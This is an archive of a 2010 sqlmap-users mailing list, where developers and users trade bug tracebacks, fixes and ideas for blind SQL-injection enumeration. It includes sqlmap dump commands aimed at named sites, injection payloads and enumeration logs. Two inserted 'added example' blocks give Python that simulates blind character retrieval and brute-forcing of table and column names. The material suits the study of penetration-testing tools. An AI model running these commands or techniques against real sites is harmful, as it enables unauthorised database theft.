> Edgar Jair Sandoval C.
> Departamento de Auditoría y Nuevas Tecnologías
> Subdirección de Seguridad de la Información / UNAM-CERT
> Correo: esandoval AT seguridad DOT unam DOT mx
> Teléfono: 56 22 81 69

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: Jair S. C. <esa...@se...> - 2010-11-19 21:14:14
|
Hi there.

The command used is:

sqlmap# ./sqlmap.py --dump-all -g "site:congreso.seguridad.unam.mx"

and the output:

sqlmap version: 0.9-dev
Python version: 2.6.2
Operating system: posix
Traceback (most recent call last):
  File "./sqlmap.py", line 82, in main
    start()
  File "/usr/bin/samurai/sqlmap/lib/controller/controller.py", line 226, in start
    injType = checkSqlInjection(place, parameter, value, parenthesis)
  File "/usr/bin/samurai/sqlmap/lib/controller/checks.py", line 75, in checkSqlInjection
    trueResult = Request.queryPage(payload, place)
  File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 338, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404)
  File "/usr/bin/samurai/sqlmap/lib/request/connect.py", line 164, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.6/urllib2.py", line 124, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.6/urllib2.py", line 375, in open
    protocol = req.get_type()
  File "/usr/lib/python2.6/urllib2.py", line 241, in get_type
    raise ValueError, "unknown url type: %s" % self.__original
ValueError: unknown url type: default?appex=Zamboni&idioma=es&nomex=Diego%20AND%204155=4155

I wish this could be helpful. Bye.

--
Edgar Jair Sandoval C.
Departamento de Auditoría y Nuevas Tecnologías
Subdirección de Seguridad de la Información / UNAM-CERT
Correo: esandoval AT seguridad DOT unam DOT mx
Teléfono: 56 22 81 69
|
From: Miroslav S. <mir...@gm...> - 2010-11-17 15:34:50
|
hi. i'll join Bernardo and say that --predict-output should do the same job. nevertheless, i will research your code and report.

kr

On Wed, Nov 17, 2010 at 4:14 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
> You spoiled one of the shiny features of sqlmap 0.9-dev that we will
> be talking about during the next weeks ;)
> It has been implemented for about 5 months or so, give it a try
> yourself with --predict-output and enjoy.
>
> Bernardo
>
>
> On 17 November 2010 14:57, Carlos Gabriel Vergara <car...@gm...> wrote:
>> Hi to all.
>>
>> Before all, i want to mention that i have been working with the repository
>> version of sqlmap (0.9) and it's awesome.
>>
>> I want to propose something crazy: Markov chains.
>> (http://en.wikipedia.org/wiki/Markov_chain)
>> Keeping it simple: a Markov chain is a tool that works on predictive
>> events. It works with events, generating a "chain" (a list) of which
>> event is going to happen if certain events have already happened.
>> When using sqlmap, let's say, when enumerating users, if in the middle
>> of the process we see that the user is "roo", it's obvious that the
>> last char will be a "t". If a table name is "aucti", the rest will be
>> "on". If we see the "events" of the Markov chain as the probability of
>> finding one char knowing the preceding chars, it could be used in
>> sqlmap, at least to "try" the most frequent char for the previous
>> combination, based on a dictionary of words (common users, tables,
>> structures, values, etc).
>> Another capability of a Markov chain is that it has "memory"; in the case of
>> char prediction, the memory specifies how many chars it will be
>> "looking back" when predicting the next.
>>
>> I have coded a sample in Python that shows the process in a very silly
>> example. It's a tool that takes a dictionary as input and a "memory size"
>> (default 2 chars back), and generates a random text based on this
>> chain. The result will be random text similar to the language used in
>> the dictionary.
>>
>> In sqlmap, the chain could be used to test the next "most probable"
>> character for the partially guessed string based on a dictionary of
>> common words.
>>
>> For example: the script was used on a dict file generated using
>> "sqlmap --help > testdict.txt", with this output:
>>
>> $ ./markov_chain.py -d testdict.txt -m 4
>> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection
>> INI file click processions can behaviour or stack-end DBMS database
>> gentry key value=RFILE -c CONFIGFILE Write DBMS current
>> Last from retrinter(s) ratingerpreteration cert=ACERT First or
>> structure affection (defaults (default 1)
>>
>> Look how the "randomly" generated text using the chain is very very
>> similar to English.
>>
>> I'm attaching the source to the mail.
>>
>> Hope it can help!
>>
>> Best regards,
>>
>>
>> --
>> --------8<--------
>> Carlos Gabriel Vergara
>> http://www.ThorSecurity.com.ar
>>
>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
>> -------->8--------
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-17 15:14:09
|
You spoiled one of the shiny features of sqlmap 0.9-dev that we will be talking about during the next weeks ;)

It has been implemented for about 5 months or so, give it a try yourself with --predict-output and enjoy.

Bernardo

On 17 November 2010 14:57, Carlos Gabriel Vergara <car...@gm...> wrote:
> Hi to all.
>
> Before all, i want to mention that i have been working with the repository
> version of sqlmap (0.9) and it's awesome.
>
> I want to propose something crazy: Markov chains.
> (http://en.wikipedia.org/wiki/Markov_chain)
> Keeping it simple: a Markov chain is a tool that works on predictive
> events. It works with events, generating a "chain" (a list) of which
> event is going to happen if certain events have already happened.
> When using sqlmap, let's say, when enumerating users, if in the middle
> of the process we see that the user is "roo", it's obvious that the
> last char will be a "t". If a table name is "aucti", the rest will be
> "on". If we see the "events" of the Markov chain as the probability of
> finding one char knowing the preceding chars, it could be used in
> sqlmap, at least to "try" the most frequent char for the previous
> combination, based on a dictionary of words (common users, tables,
> structures, values, etc).
> Another capability of a Markov chain is that it has "memory"; in the case of
> char prediction, the memory specifies how many chars it will be
> "looking back" when predicting the next.
>
> I have coded a sample in Python that shows the process in a very silly
> example. It's a tool that takes a dictionary as input and a "memory size"
> (default 2 chars back), and generates a random text based on this
> chain. The result will be random text similar to the language used in
> the dictionary.
>
> In sqlmap, the chain could be used to test the next "most probable"
> character for the partially guessed string based on a dictionary of
> common words.
>
> For example: the script was used on a dict file generated using
> "sqlmap --help > testdict.txt", with this output:
>
> $ ./markov_chain.py -d testdict.txt -m 4
> sqlmap/0.8 - authe cookie header --ver takeover own SQL injection
> INI file click processions can behaviour or stack-end DBMS database
> gentry key value=RFILE -c CONFIGFILE Write DBMS current
> Last from retrinter(s) ratingerpreteration cert=ACERT First or
> structure affection (defaults (default 1)
>
> Look how the "randomly" generated text using the chain is very very
> similar to English.
>
> I'm attaching the source to the mail.
>
> Hope it can help!
>
> Best regards,
>
>
> --
> --------8<--------
> Carlos Gabriel Vergara
> http://www.ThorSecurity.com.ar
>
> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
> -------->8--------

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: Carlos G. V. <car...@gm...> - 2010-11-17 14:57:37
|
Hi to all.

Before all, i want to mention that i have been working with the repository version of sqlmap (0.9) and it's awesome.

I want to propose something crazy: Markov chains. (http://en.wikipedia.org/wiki/Markov_chain)

Keeping it simple: a Markov chain is a tool that works on predictive events. It works with events, generating a "chain" (a list) of which event is going to happen if certain events have already happened. When using sqlmap, let's say, when enumerating users, if in the middle of the process we see that the user is "roo", it's obvious that the last char will be a "t". If a table name is "aucti", the rest will be "on". If we see the "events" of the Markov chain as the probability of finding one char knowing the preceding chars, it could be used in sqlmap, at least to "try" the most frequent char for the previous combination, based on a dictionary of words (common users, tables, structures, values, etc).

Another capability of a Markov chain is that it has "memory"; in the case of char prediction, the memory specifies how many chars it will be "looking back" when predicting the next.

I have coded a sample in Python that shows the process in a very silly example. It's a tool that takes a dictionary as input and a "memory size" (default 2 chars back), and generates a random text based on this chain. The result will be random text similar to the language used in the dictionary.

In sqlmap, the chain could be used to test the next "most probable" character for the partially guessed string based on a dictionary of common words.

For example: the script was used on a dict file generated using "sqlmap --help > testdict.txt", with this output:

$ ./markov_chain.py -d testdict.txt -m 4
sqlmap/0.8 - authe cookie header --ver takeover own SQL injection
INI file click processions can behaviour or stack-end DBMS database
gentry key value=RFILE -c CONFIGFILE Write DBMS current
Last from retrinter(s) ratingerpreteration cert=ACERT First or
structure affection (defaults (default 1)

Look how the "randomly" generated text using the chain is very very similar to English.

I'm attaching the source to the mail.

Hope it can help!

Best regards,

--
--------8<--------
Carlos Gabriel Vergara
http://www.ThorSecurity.com.ar

PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
-------->8--------
|
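The idea proposed in the message above, applied to the use case it names (ranking the next character to try while a value is retrieved one character at a time through a blind injection), as an added example. This is not Carlos's attached script, nor sqlmap's --predict-output implementation; the word list, the order-2 character model, the `CharPredictor` and `retrieve` names and the simulated yes/no oracle are all this example's own constructions.

```python
"""Added example (not sqlmap code): order-k character model from a word list,
used to rank the next character to try during character-by-character
blind retrieval. The dictionary below is constructed for the example."""
from collections import Counter, defaultdict

# Constructed stand-in for a file such as txt/common-tables.txt
SAMPLE_WORDS = [
    "root", "admin", "administrator", "auction", "auctions", "users",
    "user", "username", "usuarios", "notas", "products", "orders",
    "order_items", "sessions", "config", "mysql", "information_schema",
]

END = "\x00"  # end-of-word marker, so "no more characters" is predictable too
ALPHABET = "abcdefghijklmnopqrstuvwxyz_0123456789"


class CharPredictor:
    """Markov model: counts which character follows each `memory`-char context."""

    def __init__(self, words, memory=2):
        self.memory = memory
        self.counts = defaultdict(Counter)
        for word in words:
            padded = " " * memory + word.lower() + END  # spaces = start of word
            for i in range(memory, len(padded)):
                self.counts[padded[i - memory:i]][padded[i]] += 1

    def rank_next(self, prefix):
        """Candidate next characters, most frequent first.
        Backs off to shorter contexts when the full context was never seen."""
        padded = " " * self.memory + prefix.lower()
        for k in range(self.memory, 0, -1):
            suffix = padded[len(padded) - k:]
            merged = Counter()
            for ctx, following in self.counts.items():
                if ctx.endswith(suffix):
                    merged.update(following)
            if merged:
                return [c for c, _ in merged.most_common()]
        return []


def retrieve(secret, predictor=None):
    """Simulate blind retrieval of `secret`: the only question we may ask is
    'is the next character X?', one yes/no check per candidate, exactly as a
    boolean-based blind injection allows. Returns (value, questions_asked)."""
    found, questions = "", 0
    while True:
        order = predictor.rank_next(found) if predictor else []
        order += [c for c in ALPHABET + END if c not in order]  # untried rest
        target = secret[len(found)] if len(found) < len(secret) else END
        for c in order:
            questions += 1
            if c == target:
                break
        if target == END:
            return found, questions
        found += target


if __name__ == "__main__":
    model = CharPredictor(SAMPLE_WORDS, memory=2)
    for value in ("root", "auction", "notas"):
        naive = retrieve(value)[1]
        smart = retrieve(value, model)[1]
        print("%-8s alphabet order: %3d questions, predicted order: %3d" % (value, naive, smart))
```

With a realistic common-words list the saving is what matters: every question is one HTTP request against the target, and the predicted ordering is only ever a reordering of the same candidates, so a value the dictionary does not know still gets retrieved, just with no speed-up.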
From: Bernardo D. A. G. <ber...@gm...> - 2010-11-17 10:09:09
|
Hi,

sqlmap is nearly four and a half years old.. older than my daughters ;)

In the last 12 months a lot has been going on under the hood. Miroslav and I have been working hard trying to fix as many reported bugs as possible, getting back to You as promptly as possible and scheduling the development of new shiny features, some of them proposed by You.

First and foremost, I would like to sincerely thank Miroslav for all of the amazing effort that he has put into the project as well as into users' support. He joined me about a year ago. Since then he has demonstrated high professionalism, brilliant design and analytical capabilities and strong development skills driven by his outstanding motivation. Thank you!

In my 'state of art - 3 years later' email[1] I highlighted the main goals achieved during 2009 and my plans for the next release. What's the state now, a year later?

* The post-exploitation features have been stabilized, slightly improved and bug-fixed.
* I can still confirm that we keep receiving a lot of great feedback from You, thank you! Your bug reports, feature requests and dumb questions too keep the sqlmap community alive and drive our motivation even further.
* The media attention to the tool has mostly vanished, as I have not presented at big name Conferences this year.
* I don't think the tool is still the most downloaded tool in its category; it might be, but sourceforge now only allows seeing the weekly downloads of tools from the search page. However, who really cares.
* The detection and comparison engine has been bug-fixed, partially rewritten and highly improved by Miroslav - I told you, he is awesome!
* My call for developers is still open; quality assurance and beta testers are needed too. Some native English speakers would be of help to improve the user's manual too.

What have we achieved during 2010?

The ones that regularly update from the Subversion repository, read the ChangeLog file or asked us directly already know about some of the new features, but we would like to take the time to better introduce, explain and demonstrate them in a series of posts to the mailing list that will follow in the upcoming weeks. We hope that this will clarify design decisions that we have made, make you smile seeing your feature requests implemented and give you a strong understanding of how to use the tool efficiently.

These will all be part of the next release: 0.9, scheduled for early 2011. Stay tuned!

[1] http://sourceforge.net/mailarchive/forum.php?thread_name=ffa432520912150559x7da484d0q5a580512abf4592f%40mail.gmail.com&forum_name=sqlmap-users

Cheers,

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
From: Miroslav S. <mir...@gm...> - 2010-11-17 09:57:57
|
hi. it appears that that page uses the invalid charset 'null', probably because of some internal problem. a (probable) 'patch' can be found in the latest commit - a null charset is now just ignored.

"> the site is in English and Chinese. Could it be the Chinese part of the site the problem??"

well, more probably there is something wrong with the dynamic engine of the site than with the language itself.

kind regards.

On Wed, Nov 17, 2010 at 10:46 AM, <nig...@em...> wrote:
> Hi,
>
> my sqlmap has a new one
>
> [10:39:40] [WARNING] unknown charset 'null'. Please report by e-mail to sql...@li....
>
> the site is in English and Chinese. Could it be the Chinese part of the site the problem??
>
> greetz

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: <nig...@em...> - 2010-11-17 09:46:26
|
Hi,

my sqlmap has a new one

[10:39:40] [WARNING] unknown charset 'null'. Please report by e-mail to sql...@li....

the site is in English and Chinese. Could it be the Chinese part of the site the problem??

greetz
|
From: Miroslav S. <mir...@gm...> - 2010-11-15 15:10:34
|
hi. please update to the latest revision because there was a problem with a false "page is too dynamic". probably on most "dynamic" content pages sqlmap would quit without properly trying to remove the dynamicity inside.

kind regards.

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: Miroslav S. <mir...@gm...> - 2010-11-12 22:56:23
|
hi nightman. thank you for your report. please update to have it patched.

kr

On Fri, Nov 12, 2010 at 6:59 PM, <nig...@em...> wrote:
> C:\pentest\sqlmap.0.9>sqlmap -u "http://www.site.com/dvds.php?dvdId=4&isOn=1" --auth-type=basic --auth-cred=user:pass -f -b
>
> [18:50:12] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: nt
> Traceback (most recent call last):
>   File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main
>     start()
>   File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 261, in start
>     injType = checkSqlInjection(place, parameter, value, parenthesis)
>   File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 94, in checkSqlInjection
>     falseResult = Request.queryPage(payload, place)
>   File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 383, in queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404)
>   File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 218, in getPage
>     page = conn.read()
>   File "C:\Python26\lib\socket.py", line 329, in read
>     data = self._sock.recv(rbufsize)
>   File "C:\Python26\lib\httplib.py", line 518, in read
>     return self._read_chunked(amt)
>   File "C:\Python26\lib\httplib.py", line 561, in _read_chunked
>     raise IncompleteRead(''.join(value))
> IncompleteRead: IncompleteRead(1284 bytes read)
>
> [*] shutting down at: 18:50:12
>
> ------------------------------------------------------------------------------
> Centralized Desktop Delivery: Dell and VMware Reference Architecture
> Simplifying enterprise desktop deployment and management using
> Dell EqualLogic storage and VMware View: A highly scalable, end-to-end
> client virtualization framework. Read more!
> http://p.sf.net/sfu/dell-eql-dev2dev

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
From: <nig...@em...> - 2010-11-12 17:59:20
|
C:\pentest\sqlmap.0.9>sqlmap -u "http://www.site.com/dvds.php?dvdId=4&isOn=1" --auth-type=basic --auth-cred=user:pass -f -b

[18:50:12] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev
Python version: 2.6.5
Operating system: nt
Traceback (most recent call last):
  File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main
    start()
  File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 261, in start
    injType = checkSqlInjection(place, parameter, value, parenthesis)
  File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 94, in checkSqlInjection
    falseResult = Request.queryPage(payload, place)
  File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 383, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404)
  File "C:\pentest\sqlmap.0.9\lib\request\connect.py", line 218, in getPage
    page = conn.read()
  File "C:\Python26\lib\socket.py", line 329, in read
    data = self._sock.recv(rbufsize)
  File "C:\Python26\lib\httplib.py", line 518, in read
    return self._read_chunked(amt)
  File "C:\Python26\lib\httplib.py", line 561, in _read_chunked
    raise IncompleteRead(''.join(value))
IncompleteRead: IncompleteRead(1284 bytes read)

[*] shutting down at: 18:50:12
|
From: Miroslav S. <mir...@gm...> - 2010-11-11 17:12:29
|
hi. now you can use --columns (same effect as with --common-columns) with ms access too. it will use the --common-columns switch, which does a brute force check for the existence of common columns in a given table (-T). this also applies to MySQL without schema.

kr

p.s. dumping of tables is next on the list ;). i only hope that there won't be any big issues.

On Tue, Nov 9, 2010 at 3:57 PM, Miroslav Stampar <mir...@gm...> wrote:
> just a quick report. i've collected "common columns" a couple of days
> ago (./txt/common-columns.txt) so "brute force get column names" will
> be available in a few.
>
> kr
>
> On Tue, Nov 9, 2010 at 3:06 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
>> "The law of the default"
>>
>> If you must explicitly set the permissions, then it will be difficult to
>> find this kind of info. But if we are lucky and find some
>> "lazy-non-standard" programming, this could be a nice security breach.
>>
>> I will read a little further... if something is found, I will share it.
>>
>> Best regards,
>>
>>
>> 2010/11/5 Miroslav Stampar <mir...@gm...>:
>>> well,
>>>
>>> SELECT Name FROM MSysObjects WHERE Type = 1
>>>
>>> (we already have it in ./xml/queries.xml)
>>>
>>> should basically get you this kind of information, but as I've
>>> understood querying it from outside the MS Access environment (web
>>> browser, ODBC connection) should result in:
>>>
>>> .....id=1 AND EXISTS(SELECT * FROM MSysObjects)
>>>
>>> Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
>>> Microsoft Access Driver] Record(s) cannot be read; no read permission
>>> on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line
>>> 33
>>> SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot
>>> be read; no read permission on 'MSysObjects'.
>>>
>>> i haven't tested this against an ASP environment, though.
>>>
>>> On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
>>>> I was working with access some time ago, and now that you mention it, i
>>>> was working on getting metadata for the db. As far as i know, there
>>>> are some "system tables", equivalent to sysobjects (mssql) or
>>>> information_schema (mysql). Take a look at this article:
>>>>
>>>> http://www.datanumen.com/aar/articles/system-object.htm
>>>>
>>>> If i can find my test scripts, i will attach some to the list.
>>>>
>>>> Best regards,
>>>>
>>>>
>>>> 2010/11/4 Miroslav Stampar <mir...@gm...>:
>>>>> hi Ulises.
>>>>>
>>>>> i am glad to see that someone has started using sqlmap against Access
>>>>> databases :)
>>>>>
>>>>> we've done the necessary patches to prevent a sqlmap crash in this kind of
>>>>> situation, but still, we haven't implemented dumping of tables for
>>>>> MS Access (due to the non-existent way for column enumeration - if someone
>>>>> has some idea not related to brute force, please say and we'll try to
>>>>> implement it). also, support for this DBMS is still in an (early)
>>>>> development phase and we hope that we'll finish it in some reasonable
>>>>> time.
>>>>>
>>>>> kr
>>>>>
>>>>> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote:
>>>>>>
>>>>>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session file
>>>>>> [15:30:49] [INFO] resuming injection point 'GET' from session file
>>>>>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file
>>>>>> [15:30:49] [INFO] resuming injection type 'numeric' from session file
>>>>>> [15:30:49] [INFO] resuming match ratio '0.9' from session file
>>>>>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file
>>>>>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session file
>>>>>> [15:30:49] [INFO] testing connection to the target url
>>>>>> [15:30:50] [INFO] testing for parenthesis on injectable parameter
>>>>>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access
>>>>>> web server operating system: Windows 2008
>>>>>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP
>>>>>> back-end DBMS: Microsoft Access
>>>>>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access
>>>>>> do you want to use common table existance check? [Y/n/q]Y
>>>>>> [15:30:52] [INFO] checking tables existence using items from '/root/sqlmap-dev/txt/common-tables.txt'
>>>>>> [15:32:06] [INFO] retrieved: notas
>>>>>> [15:57:55] [INFO] tried: 1780/1780 items (100%)
>>>>>>
>>>>>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
>>>>>> sqlmap version: 0.9-dev (r2265)
>>>>>> Python version: 2.5.2
>>>>>> Operating system: posix
>>>>>> Traceback (most recent call last):
>>>>>>   File "./sqlmap.py", line 79, in main
>>>>>>     start()
>>>>>>   File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start
>>>>>>     action()
>>>>>>   File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action
>>>>>>     conf.dbmsHandler.dumpAll()
>>>>>>   File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in dumpAll
>>>>>>     for db, tables in kb.data.cachedTables.items():
>>>>>> AttributeError: 'list' object has no attribute 'items'
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper
>>>>>> David G. Thomson, author of the best-selling book "Blueprint to a
>>>>>> Billion" shares his insights and actions to help propel your
>>>>>> business during the next growth cycle. Listen Now!
>>>>>> http://p.sf.net/sfu/SAP-dev2dev
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>>
>>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>>> Mobile: +385921010204 (HR 0921010204)
>>>>> PGP Key ID: 0xB5397B1B
>>>>> Location: Zagreb, Croatia
>>>>
>>>> --
>>>> --------8<--------
>>>> Carlos Gabriel Vergara
>>>> http://www.ThorSecurity.com.ar
>>>>
>>>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
>>>> -------->8--------
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>
>> --
>> --------8<--------
>> Carlos Gabriel Vergara
>> http://www.ThorSecurity.com.ar
>>
>> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp
>> -------->8--------
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
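What the thread above calls the "common table existence check" and the "brute force check for existence of common columns", as an added example that is not sqlmap's own code. When the catalog (MSysObjects here) is unreadable, the only thing left is to ask the blind oracle one yes/no question per dictionary entry. The in-memory SQLite database, its `notas` table, the two short wordlists and the probe shape `AND EXISTS(SELECT <col> FROM <table>)` are this example's assumptions (the thread shows `AND EXISTS(SELECT * FROM MSysObjects)` as the table-level probe; the column-level form is an extrapolation).

```python
"""Added example (not sqlmap code): brute-forcing table and column names through
a boolean-based blind injection when no schema catalog can be read.
SQLite stands in for the vulnerable application; the table, rows and
wordlists are constructed for the example."""
import sqlite3

# Constructed stand-ins for txt/common-tables.txt and txt/common-columns.txt
COMMON_TABLES = ["users", "admin", "products", "notas", "members"]
COMMON_COLUMNS = ["id", "name", "username", "password", "email", "titulo", "texto", "fecha"]


def make_target():
    """The application's database: one table the attacker cannot list via a catalog."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notas (id INTEGER, titulo TEXT, texto TEXT, fecha TEXT)")
    db.execute("INSERT INTO notas VALUES (1, 'hello', 'body', '2010-11-04')")
    return db


def page(db, injected_value):
    """The 'web page': concatenates the parameter into SQL, as in the reports above.
    Returns the rendered rows, or None when the DBMS raised an error (an error
    page is simply a page that differs from the baseline)."""
    sql = "SELECT titulo FROM notas WHERE id=" + injected_value
    try:
        return str(db.execute(sql).fetchall())
    except sqlite3.OperationalError:
        return None


def oracle(db, condition):
    """Boolean-based blind check: does  id=1 AND <condition>  render the same
    page as the untouched  id=1 ?"""
    return page(db, "1 AND " + condition) == page(db, "1")


def brute_tables(db, wordlist):
    """Table names for which EXISTS(SELECT * FROM <t>) leaves the page unchanged.
    Caveat: an existing but empty table also answers 'false' with this probe;
    (SELECT COUNT(*) FROM <t>) >= 0 would not have that blind spot."""
    return [t for t in wordlist if oracle(db, "EXISTS(SELECT * FROM %s)" % t)]


def brute_columns(db, table, wordlist):
    """Column names for which EXISTS(SELECT <c> FROM <table>) does not error.
    Caveat: a name that exists only in the outer query's table may still resolve
    as a correlated reference on some engines, so confirm hits with a second
    probe that does not mention the outer table."""
    return [c for c in wordlist if oracle(db, "EXISTS(SELECT %s FROM %s)" % (c, table))]


def enumerate_schema(db, tables=COMMON_TABLES, columns=COMMON_COLUMNS):
    """Whole procedure: tables first, then the columns of every table found."""
    return {t: brute_columns(db, t, columns) for t in brute_tables(db, tables)}


if __name__ == "__main__":
    target = make_target()
    print(enumerate_schema(target))
```

Each dictionary entry costs one request (two, if the baseline is re-fetched), which is why the log above shows 1780 items taking about 25 minutes; the same oracle is what a later `--dump` has to use to pull the cell values out one character at a time.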
From: Miroslav S. <mir...@gm...> - 2010-11-09 14:57:09
|
just a quick report. i've collected "common columns" a couple of days ago (./txt/common-columns.txt) so "brute force get column names" will be available in a few.

kr

On Tue, Nov 9, 2010 at 3:06 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
> "The law of the default"
>
> If you must explicitly set the permissions, then it will be difficult to
> find this kind of info. But if we are lucky and find some
> "lazy-non-standard" programming, this could be a nice security breach.
>
> I will read a little further... if something is found, I will share it.
>
> Best regards,
>
>
> 2010/11/5 Miroslav Stampar <mir...@gm...>:
>> well,
>>
>> SELECT Name FROM MSysObjects WHERE Type = 1
>>
>> (we already have it in ./xml/queries.xml)
>>
>> should basically get you this kind of information, but as I've
>> understood querying it from outside the MS Access environment (web
>> browser, ODBC connection) should result in:
>>
>> .....id=1 AND EXISTS(SELECT * FROM MSysObjects)
>>
>> Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
>> Microsoft Access Driver] Record(s) cannot be read; no read permission
>> on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line
>> 33
>> SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot
>> be read; no read permission on 'MSysObjects'.
>>
>> i haven't tested this against an ASP environment, though.
>>
>> On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara <car...@gm...> wrote:
>>> I was working with access some time ago, and now that you mention it, i
>>> was working on getting metadata for the db. As far as i know, there
>>> are some "system tables", equivalent to sysobjects (mssql) or
>>> information_schema (mysql). Take a look at this article:
>>>
>>> http://www.datanumen.com/aar/articles/system-object.htm
>>>
>>> If i can find my test scripts, i will attach some to the list.
>>>
>>> Best regards,
>>>
>>>
>>> 2010/11/4 Miroslav Stampar <mir...@gm...>:
>>>> hi Ulises.
>>>>
>>>> i am glad to see that someone has started using sqlmap against Access
>>>> databases :)
>>>>
>>>> we've done the necessary patches to prevent a sqlmap crash in this kind of
>>>> situation, but still, we haven't implemented dumping of tables for
>>>> MS Access (due to the non-existent way for column enumeration - if someone
>>>> has some idea not related to brute force, please say and we'll try to
>>>> implement it). also, support for this DBMS is still in an (early)
>>>> development phase and we hope that we'll finish it in some reasonable
>>>> time.
>>>>
>>>> kr
>>>>
>>>> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote:
>>>>>
>>>>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session file
